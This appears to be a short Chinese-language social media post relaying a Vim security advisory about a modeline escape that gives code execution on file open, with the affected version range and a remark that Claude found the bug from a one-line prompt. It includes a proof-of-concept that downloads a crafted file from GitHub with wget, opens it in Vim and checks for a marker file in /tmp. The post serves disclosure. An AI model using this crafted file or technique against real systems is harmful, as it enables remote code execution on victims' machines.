vim存在rce，打开文件即可触发

11:35 · 2026年3月31日 · 周二

vim存在rce，打开文件即可触发

https://github.com/vim/vim/security/advisories/GHSA-2gmj-rpqf-pxvh

poc

vim -version
# VIM - Vi IMproved 9.2 (2026 Feb 14, compiled Mar 25 2026 22:04:13)
wget https://raw.githubusercontent.com/califio/publications/refs/heads/main/MADBugs/vim-vs-emacs-vs-claude/vim.md
vim vim.md
cat /tmp/calif-vim-rce-poc

漏洞还是claude发现的，prompt只有一句话

Somebody told me there is an RCE 0-day when you open a file. Find it.

GitHub

Vim tabpanel modeline escape affects Vim > 9.1.1390 && Vim < 9.2.0272

Vim tabpanel modeline escape affects Vim > 9.1.1390 && Vim < 9.2.0272
===================================================
Date: 30.03.2026
Severity: High
CVE: *not-yet-assigned*
...